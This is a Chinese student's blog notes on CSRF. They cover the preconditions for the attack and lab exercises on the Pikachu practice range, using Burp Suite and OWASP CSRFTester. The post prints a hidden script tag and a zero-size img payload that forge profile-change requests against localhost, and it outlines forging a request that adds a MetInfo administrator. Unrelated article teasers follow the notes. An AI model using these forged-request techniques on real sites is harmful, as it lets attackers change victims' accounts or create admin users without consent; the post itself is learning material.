网络安全之CSRFSSRF漏洞(上篇)(技术进阶)

目录

一,CSRF篇

二,认识什么是CSRF

三,实现CSRF攻击的前提

四,实战演练

【1】案例1

【2】案例2

【3】案例3

【4】案例4(metinfo)


一,CSRF篇

二,认识什么是CSRF

CSRF(Cross-site request forgery)简称:跨站请求伪造,存在巨大的危害性。是攻击者制造一个请求(一般是一个链接)诱导用户去点击,从而通过用户去访问正常的网站用攻击者伪造的请求去对网站发送一个请求。

三,实现CSRF攻击的前提

1,有这个漏洞(自己弄个号来攻击自己,成功了就说明有这个漏洞)

2,用户已经登录了

3,要知道协议包的结构(不然怎么伪造请求呢)

4,浏览器支持(如没有同源策略)

5,用户点击并打开恶意网站

四,实战演练

皮卡丘靶场为例:

环境:受害者为主机,虚拟机搭建恶意网站

在虚拟机中新建一个test.html,恶意网站代码为:

<script src='http://localhost/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=gg&phonenum=1111&add=
11111&email=111111&submit=submit'>
</script>

【1】案例1

2,提交后他打开了小黑子的恶意网站

【2】案例2

1,使用bp抓包生成CSRF攻击代码

2,将生成的代码复制到虚拟机的恶意网站中

3,去访问恶意网站后

 

【3】案例3

使用OWASP-CSRFT工具

1,设置浏览器代理

2,开启工具进行抓包

      

3,用户点击提交后得到数据包:

4,生成一个攻击用的html文档

文档内容:

<html>

<head>
<title>OWASP CRSFTester Demonstration</title>
</head>

<body>

<H2>OWASP CRSFTester Demonstration</H2>

<img src="http://localhost:80/pkq/vul/csrf/csrfget/csrf_get_edit.php?sex=nang&phonenum=66666666&add=6666666&email=666666&submit=submit&" width="0" height="0" border="0"/>

</body>
</html>

5,将生成的html文件放到恶意网站中

用户去访问恶意网站

【4】案例4(metinfo)

1,登录后台

2,新增管理员用户

3,开启抓包

4,将抓取到的包含要用的数据的包生成html文件 

5,把文件放入恶意网站中,用户去访问

 

 

以上就是我的学习笔记了,谢谢观看!!!(下篇要等到周日发哈)

要高考了,现在一周最多更3篇了

最后一个月高考冲刺会断更到高考结束 

高考结束后我会增加基础内容笔记并修改以前写的笔记争取每篇评分达到90分以上哈

后续我还考虑录制视频,关注我一起学习网络安全技术为祖国的护网行动增添新能量。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/2549.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Diff算法深度剖析:优化DOM操作的关键

React的Diff算法是用于比较新旧虚拟DOM树&#xff0c;以找出需要进行更新的部分。它通过遍历树的节点&#xff0c;并比较节点属性和内容&#xff0c;来确定节点是否需要进行更新。 React的Diff算法采用了一些优化策略&#xff0c;以减少不必要的DOM更新&#xff0c;提高性能。…

程序员过了35岁没人要?“这行越老越香”

程序员35岁失业&#xff1f;参加完OceanBase开发者大会&#xff0c;我又悟了&#xff01; 周六参加了OceanBase2024 开发者大会的现场&#xff0c;来之前我其实挺忐忑的&#xff0c;我觉得一个数据库产品的发布会&#xff0c;能有什么新鲜的东西&#xff1f; 踏入酒店的那一刻&…

vue 动态改变css样式

文章目录 问题描述 问题描述 大家好&#xff01;今天是2024年4月26日|农历三月十六&#xff0c;时间过得好快&#xff0c;今天这博文主要动态改变css样式&#xff0c;具体实现效果如下&#xff1a; 在data里面声明一个isShow:true属性&#xff0c;通过isShow显示不同的图片 isS…

RouteRecordRaw

最近在学习并使用typescript&#xff0c;接触到了很多新类型&#xff0c;今天在学习过程中&#xff0c;看到了RouteRecordRaw这个类型&#xff0c;写篇博客记录一下。 RouteRecordRaw RouteRecordRaw 是 Vue Router 4 中新增的一个类型定义。 它是用于定义路由记录的。 在 Vu…

Pinia 深度剖析:Vue.js 应用状态管理的全面指南

一、pinia简介 Pinia 是一个专门为 Vue.js 应用程序设计的状态管理库。它的设计理念是简化状态管理过程&#xff0c;提供一种清晰、可维护的方式来管理应用程序中的数据。 二、安装与创建 1.你可以通过 npm 或者 yarn 来安装 Pinia&#xff1a; npm install pinia # 或者 y…

上位机工作感想-从C#到Qt的转变-2

2.技术总结 语言方面 最大收获就是掌握了C Qt编程&#xff0c;自己也是粗看了一遍《深入理解计算机系统》&#xff0c;大致了解了计算机基本组成、虚拟内存、缓存命中率等基基础知识&#xff0c;那本书确实有的部分看起来很吃力&#xff0c;等这段时间忙完再研读一遍。对于封装…

消消乐算法总结

前言 最近在工作中遇到一个问题&#xff0c;做一个消消乐的demo项目&#xff0c;连续相同数目超过四个后就要消除。我在网上看了很多解决方案&#xff0c;有十字形&#xff0c;横向&#xff0c;纵向&#xff0c;梯形搜索。越看越迷糊。这不是用一个BFS就能解决的问题吗&#x…

linux下tcp/udp协议网络通信接口封装+日志打印对象

目录 引入 代码 log.hpp代码 引入 我们可以把之前写过的代码拿过来整合一下,直接封装出网络套接字的接口 这样之后再使用的话,直接调用接口即可这里写的是tcp协议,也可以修改socket函数里的参数,改为udp协议 代码 #pragma once#include <iostream> #include <stri…

实现 vuereact 混合开发项目步骤-微前端

微前端是一种将多个小型前端应用组合成一个大型应用的架构方式。它允许团队独立开发、测试、部署和维护应用的各个部分。Vue.js 和 React 是两个流行的前端框架&#xff0c;它们可以在同一微前端架构下协同工作。 一、常规流程 1. 项目规划 确定项目的范围和目标。 设计应用的…

Qt:实现TCP同步与异步读写消息

一、异步读写 在 Qt 中实现 TCP 客户端和服务器的同步和异步读写消息涉及使用 QTcpSocket 和 QTcpServer 类。这两个类提供了用于建立 TCP 连接、发送和接收数据的功能。下面是一个简单的示例&#xff0c;演示了如何在 Qt 中实现 TCP 客户端和服务器的同步和异步读写消息&…

ISP比普通的静态代理相比有什么优势?

ISP&#xff08;Internet Service Provider&#xff09;&#xff0c;即互联网服务提供商&#xff0c;是向广大用户综合提供互联网接入业务、信息业务、增值业务的电信运营商。而静态代理则是一个固定不变的代理IP地址&#xff0c;具有稳定性强、兼容性好和管理方便等特点。当我…

深入理解Java消息中间件-Apache Kafka

在数字化时代&#xff0c;数据如同血液一样流动于现代应用的每一个角落。如何高效、可靠地处理这些数据流&#xff0c;成为了构建响应式、可扩展和弹性系统的关键挑战。作为一名专业的Java技术架构师和作家&#xff0c;我将深入分析Apache Kafka这一广泛使用的Java消息中间件解…

LiveNVR监控流媒体Onvif/RTSP常见问题-如何对比监控摄像头延时视频流延时支持webrtc视频流播放超低延时播放

LiveNVR如何对比监控摄像头延时视频流延时支持webrtc视频流播放超低延时播放 1、问题场景2、如何对比延时&#xff1f;3、WEBRTC延时对比4、LiveNVR支持WEBRTC输出5、RTSP/HLS/FLV/RTMP拉流Onvif流媒体服务 1、问题场景 需要低延时的视频流监控播放&#xff0c;之前可以用rtmp…

什么是架构?说说我的理解

什么是架构了&#xff1f;其实就是根据企业的具体情况给出的一个解决方案&#xff0c;并且这个架构能升级&#xff0c;如果企业的流量突然暴增&#xff0c;也能适应变化&#xff0c;这才是好的架构&#xff0c;一个项目是采用单体架构了&#xff1f;还是采用前后端分离&#xf…

在docker容器中编译 rk3588 ubuntu固件

文件准备 Linux SDK ---- rk3588_linux_release_20230114_v1.0.6c_0*Ubuntu根文件系统 ---- Ubuntu22.04-Xfce_RK3588_v3.11-27_20240410.img.7z 硬件环境 一个可联网的linux机器&#xff0c;并且装有docker 打包一个docker编译环境 Dockerfile内容 直接通过dockerfile构…

路由引入,过滤实验

实验拓补图 实验目的&#xff1a; 1、按照图示配置 IP 地址&#xff0c;R1&#xff0c;R3&#xff0c;R4 loopback口模拟业务网段 2、R1 和 R2 运行 RIPv2,R2&#xff0c;R3和R4运行 OSPF&#xff0c;各自协议内部互通 3、在 RIP 和 oSPF 间配置双向路由引入,要求除 R4 上的…

OceanBase诊断调优 】—— 如何快速定位SQL问题

作者简介&#xff1a; 花名&#xff1a;洪波&#xff0c;OceanBase 数据库解决方案架构师&#xff0c;目前负责 OceanBase 数据库在各大型互联网公司及企事业单位的落地与技术指导&#xff0c;曾就职于互联网大厂和金融科技公司&#xff0c;主导过多项数据库升级、迁移、国产化…

Qt配置CMake出错

一个项目需要在mingw环境下编译Opencv源码&#xff0c;当我用Qt配置opencv的CMakeLists.txt时&#xff0c;出现了以下配置错误&#xff1a; 首先我根据下述博文介绍&#xff0c;手动配置了CMake&#xff0c;但仍不能解决问题。 Qt(MinGW版本)安装 - 夕西行 - 博客园 (cnblogs.…

计算机网络相关知识总结

一、概述 计算机网络可以极大扩展计算机系统的功能机器应用范围&#xff0c;提高可靠性&#xff0c;在为用户提供放方便的同时&#xff0c;减少了整体系统费用&#xff0c;提高性价比。 计算机网络的功能主要有&#xff1a;1. 数据共享&#xff1b;2. 资源共享&#xff1b;3. 管…

equals和==有什么区别?

面试题目 和equals有什么区别&#xff1f;这两个都适用于哪些场景进行比较&#xff1f;为什么重写了equals方法&#xff0c;还必须重写hashcode方法&#xff1f; 这个问题基本上在各面试题库中都会有出现&#xff0c;也是现实项目中使用比较多的一个比较&#xff0c;面试的时…